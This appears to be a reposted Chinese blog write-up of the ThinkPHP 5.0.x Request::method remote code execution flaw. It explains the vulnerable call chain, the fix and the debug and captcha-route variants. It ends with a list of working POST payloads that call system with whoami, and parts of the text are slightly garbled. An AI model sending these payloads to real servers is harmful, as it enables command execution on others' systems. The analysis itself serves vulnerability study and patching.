ThinkPHP5 Request类method任意方法调用RCE

news2024/9/20 18:42:56

ThinkPHP v5.0.x

影响版本：5.0.0 <= version <= 5.0.23
漏洞点：\think\Request::method

修复：版本更新 · top-think/framework@4a4b5e6 · 改进Request类

环境

thinkphp5.0.23核心版（需开启debug）
thinkphp5.0.22完整版（通过captcha路由）

method任意调用方法导致rce

开启debug选项

POST
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

处理请求到路由检测部分的时候会调用\think\Request::method函数

该函数用于获取当前请求类型，config文件默认为_method

在获取method之后便会通过动态调用去调用method值同名类方法，即__construct传递的值为post数组。

__construct函数中对 $o pt i o n 的键名同名的类属性赋值为$ options中该键的对应值。按照payload中的内容即是对filter和server属性进行替换。

最后\think\Request::param去调用method获取原始请求类型时进入\think\Request::server函数这时的$this->server已经被覆盖为whoami

最终传入\think\Request::filterValue由call_user_func进行方法调用。

在\think\App::run中的位置如下

此时的触发点位于记录路由和请求信息的部分，这也是为什么需要开启debug选项。

5.0.13版本之前无需开启debug就能rce，之前的版本中下图代码不会在think\App::exec() -> think\App::module() 中重新再设置一次默认filter，这就会覆盖传入的恶意filter类属性。

之前的版本仅在路由调度之前进行设置filter，think\App::module()中不再进行设置。

而debug记录的位置位于think\App::exec()上方，自然不会受到影响。

关闭debug选项（默认）

从上面可以看到，filter变量清除在module分支中完成的，通过进入其他进行绕过分支。

#无回显
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
#有回显，传参方式差异    
POST ?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
or
_method=__construct&method=get&filter[]=system&get[]=whoami

此时的调用链如下，由array_walk_recursive调用filterValue函数，完成命令执行。

payload

#debug相关
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
    
aaaa=whoami&_method=__construct&method=GET&filter[]=system
    
_method=__construct&method=GET&filter[]=system&get[]=whoami
    
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami
    
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
    
#需进入非module路由
#无回显
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
#有回显，传参方式差异    
POST ?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

_method=__construct&method=get&filter[]=system&get[]=whoami

参考

https://y4er.com/posts/thinkphp5-rce/

https://www.sec-in.com/article/1863

https://xz.aliyun.com/t/7792
.com/article/1863](https://www.sec-in.com/article/1863)

https://xz.aliyun.com/t/7792

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/177815.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！